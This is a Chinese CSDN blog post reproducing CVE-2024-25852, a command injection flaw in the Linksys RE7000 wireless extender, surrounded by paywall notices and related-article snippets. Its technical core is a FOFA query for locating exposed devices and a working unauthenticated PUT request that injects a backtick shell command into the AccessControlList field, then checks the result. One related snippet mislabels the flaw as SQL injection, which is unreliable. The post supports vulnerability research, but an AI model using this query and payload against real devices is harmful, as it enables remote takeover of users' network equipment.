【漏洞复现】Linksys RE7000无线扩展器 命令注入漏洞(CVE-2024-25852)

最新推荐文章于 2024-07-10 17:20:01 发布
最新推荐文章于 2024-07-10 17:20:01 发布
阅读量243 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 科技 安全 php 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/138086632
版权

0x01 产品简介

Linksys RE7000无线扩展器是一款功能强大、操作便捷的产品,旨在为用户提供无缝的网络覆盖和更快速、更稳定的网络连接体验。

0x02 漏洞概述

Linksys RE7000无线扩展器存在命令注入漏洞,未授权的攻击者可以通过该漏洞执行任意命令,控制服务器。

0x03 测绘语句

fofa: body="/login.shtml?ran="

0x04 漏洞复现

PUT /goform/AccessControl HTTP/1.1

Host:



{"AccessPolicy":"0","AccessControlList":"`echo 123>/etc_ro/lighttpd/RE7000_www/1.txt`"}

GET /1.txt HTTP/1.1

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Linksys RE7000无线扩展器 RCE漏洞复现(CVE-2024-25852)
0xSec
04-20 709
Linksys RE7000无线扩展器在访问控制功能点的“AccessControlList”参数中存在命令执行漏洞。未经身份验证的远程攻击者可以利用该漏洞获取设备管理员权限。
wooluo#POC#Linksys WRT160NL 身份验证命令注入CVE-2021-25310)1
07-25
Linksys WRT160NL 身份验证命令注入CVE-2021-25310)成功利用此漏洞可能导致在受影响的设备上远程执行代码。缺少输出编码和输入验证,使
漏洞复现Linksys-RE7000无线扩展器-命令执行-AccessControl(CVE-2024-25852)
知黑而守白
05-05 68
RE7000Linksys新推出的一款具有无缝漫游功能的双频AC1900无线扩展器,重点是with seamless roaming(无缝漫游),这在家用级产品上很少出现。Linksys-RE7000无线扩展器 AccessControl 接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
CVE-2024-25852 Linksys RE7000无线扩展器 RCE漏洞
一个努力学习网安的小牛马
05-11 257
RE7000Linksys推出的一款具有无缝漫游功能的双频AC1900无线扩展器,重点是with seamless roaming(无缝漫游)RE7000无线扩展器在访问/goform/AccessControl功能接口时在AccessControlList参数存在远程命令执行。本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任。抓包用PUT方法提交参数。
宽带宝固件KDB-LINKSYS-RE6500-1.00.0214
06-01
【宽带宝固件KDB-LINKSYS-RE6500-1.00.0214】是一个针对LINKSYS RE6500型号Wi-Fi信号增强器的固件更新,该固件版本为1.00.0214。固件是设备的操作系统,它控制和管理设备的所有功能,包括网络连接、安全设置、性能...
Linksys RE4000W_v1.0.01.001_20180321无线中继固件
10-28
May 11, 2018 This document contains the licenses and notices for open source software used in RE4000W v1.0.01.001 . With respect to the free/open source software listed in this document, if you have ...
基础电子中的优化Wi-Fi 提高无线网络性能
11-12
在过去几年里,大多数售出的无线路由器都具有QoS功能,但是你可能还是希望能够更新路由器的固件来解决问题。  就拿一台Linksys的路由器来举例吧,我们可以通过配置程序做一些改变。首先确定你的设备是支持WMM(Wi-...
思科Linksys EA6500无线路由器官方固件1.1.29.162351版
08-12
【思科Linksys EA6500无线路由器官方固件1.1.29.162351版】是思科公司为Linksys EA6500无线路由器提供的一个重要软件更新。固件,简单来说,就是控制硬件设备运行的软件,它包含了设备的操作系统和驱动程序,对设备...
【蓄势·致远】 同为科技(TOWE)2024年年中会议
TOWE_Tech的博客
07-10 171
在团队和企业面临各种的挑战的当下,企业内部团队协同合作更为重要,创新发展和解决行业与客户的需求、为客户高价值的服务为对话核心,实现企业稳步增长的规划。用长远的规划和战略目光,不断自我调整适应企业的发展和时代的需求,以有目标、有理想、有信心的饱满的状态,实现个人价值、部门价值、企业价值、社会价值。当今的科技环境日新月异,不断的自我认知,自我学习,通过学术知识、科技信息来满足内部的升级需求,实现企业、个人全面顺应时代、社会发展变化的环境。在危机时刻、蛰伏蓄势、拥抱变化,适应时代,赋能发展,释放潜力。
绘唐科技聚星文社是同款一键生成工具
2401_84285498的博客
07-05 623
绘唐科技的目标是利用虚拟现实技术为人们带来更加沉浸式的体验,推动虚拟现实在各个领域的应用和发展。绘唐科技的未来发展充满了无限的可能性。他们将继续致力于虚拟现实技术和产品的研究和开发,不断推动虚拟现实的应用和发展,在改变人们生活方式的同时,也为行业发展带来更多的机遇和挑战。绘唐科技专注于虚拟现实硬件和软件的研发,他们的产品包括VR头盔、手柄、运动追踪系统等。绘唐科技的团队由一群拥有丰富实践经验和技术造诣的研发人员组成,他们致力于不断创新和突破,为用户提供更加优秀和卓越的虚拟现实产品和体验。
美光科技2024年1γ工艺技术在10纳米级别启动EUV试产
存储随笔
07-05 522
美光科技(Micron)在2024年针对其1γ(1-gamma)工艺技术在10纳米级别启动EUV(极紫外光刻)试产,这标志着存储行业巨头在EUV采用上的重要一步,尽管相比英特尔和台积电等其他半导体制造商,美光的步伐显得更为谨慎。为了满足AI带动的高性能存储芯片强劲需求,美光除了推进EUV技术的DRAM生产外,还计划在美国建立HBM(高带宽内存)的试生产线,并考虑首次在马来西亚生产HBM,进一步布局其高端存储解决方案的生产能力。目前,美光所有大规模生产的产品仍采用DUV(深紫外线光刻)技术。
【观成科技】Websocket协议代理隧道加密流量分析与检测
最新发布
GCKJ_0824的博客
07-10 512
Websocket中的掩码加密使用异或(xor)做简单的加密,当MASK字段对应位被设置为 1 时表示加密,那么后续会设置4字节的Masking-key,Mask位设置为 0 时表示不加密,则不会携带Masking-key。观成科技安全团队通过研究Websocket协议本身结构特点,并与对应的工具流量相结合,从而提出行之有效的检测方法应用于产品当中,能在Websocket流量中准确发现异常,找出相关隧道的搭建和使用痕迹,保障客户网络安全。Websocket协议代理工具加密流量检测。
开思通智网-科技快报20240704:全球首个,人工智能之城,AI填报志愿
opensnn的博客
07-05 747
【本周新进展】【本周国外资讯】【其他】
国际网课平台Udemy上的亚马逊云科技AWS免费高分课程和创建、维护EC2动手实践
m0_66628975的博客
07-09 695
Udemy作为全球最大、最优质的网课平台之一,上面有非常多优质的亚马逊云科技AWS课程。但Udemy上的亚马逊云科技AWS课程最便宜的也要几十刀,最贵能到上百刀,十分昂贵。今天小李哥就给大家盘点全网最全的 Udemy上AWS免费高分课程大合集(选择标准为:评分4.4/5左右,好评500左右的课程)。14 Introduction to Cloud Computing for Beginners in 30 mins(4.2分)
隔离计数器卡 脉冲编码器模块USB2392 采集48V电压 北京阿尔泰科技
2401_85361707的博客
07-10 367
USB总线, 4路,隔离计数器模块USB2392,可采集高达48V的电压;与LabVIEW无缝连接,提供图形化API函数。
IT之家最新科技热点 | 小米 AI 研究院开创多模态通用模型
double222222的博客
07-07 898
这是一个引人注目的技术突破,快来看看它是如何改变我们对 AI 的理解和应用的吧!它不仅在技术层面上带来了新颖的应用,也让我们离更智能的未来生活更近了一步!:对于科技迷们来说,小米 AI 研究院的不断突破不仅展示了中国科技企业的创新实力,也为我们未来的智能生活打开了更多的可能性。:多模态技术正在改变我们与技术互动的方式,无论是在家里、路上还是在医院,它都在不断提升我们的生活质量和工作效率。:展示多模态模型在实际应用中的场景,如智能家居设备的自动控制、自动驾驶系统的综合感知和医疗诊断中的数据融合等。
探索加油小程序开发:便捷出行的科技新篇章
2402_83689311的博客
07-09 290
在快节奏的现代生活中,出行已成为人们日常生活中不可或缺的一部分。随着移动互联网技术的飞速发展,各类小程序以其轻量、便捷的特点迅速融入人们的日常生活,其中,加油小程序作为智慧出行领域的一股清流,正悄然改变着我们的加油体验。本文将深入探讨加油小程序的开发背景、核心功能、技术实现及市场前景,展现这一创新应用如何为车主带来前所未有的便捷与高效。
土壤分析仪:解密土壤之奥秘的科技先锋
m0_69813885的博客
07-10 195
土壤分析仪,作为现代科技在农业和环保领域的杰出代表,以其高效、精准的分析能力,为我们揭示了土壤的奥秘,为农业生产提供了科学指导,为环境保护提供了有力支持。土壤分析仪通过采集土壤样本,利用化学试剂,对土壤中的水分、养分、酸碱度、电导率等关键参数进行精确测量,这些参数是评估土壤质量、指导农业生产的重要依据。土壤分析仪能够快速准确地测量土壤的PH值,帮助农民了解土壤的酸碱状况,为土壤调理提供依据。土壤分析仪能够实时测量土壤中的水分含量,帮助农民判断土壤是否需要灌溉,实现节水农业。土壤分析仪的主要功能。
ac1900 linksys 恢复_linksys思科WRT1900ACS刷机变砖维修
05-13
如果你的Linksys WRT1900ACS路由器因为刷机而变砖了,你可以尝试以下步骤进行修复: 1. 从Linksys官方网站上下载固件文件,并将其保存到电脑上。 2. 将路由器连接到电脑上,使用网线连接。 3. 打开Web浏览器,输入路由器的IP地址(通常是192.168.1.1)进入路由器管理界面。 4. 在管理界面中,选择“Firmware Upgrade”(固件升级)选项,然后点击“Browse”(浏览)按钮,找到并选择你下载的固件文件。 5. 点击“Start Upgrade”(开始升级)按钮,等待固件升级完成。 6. 在固件升级完成后,路由器会自动重启。等待几分钟,直到路由器重新启动并且网络连接正常。 如果以上步骤无法修复路由器,你可以尝试使用Linksys官方提供的恢复工具进行修复。具体操作步骤可以参考Linksys官方网站上的说明文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值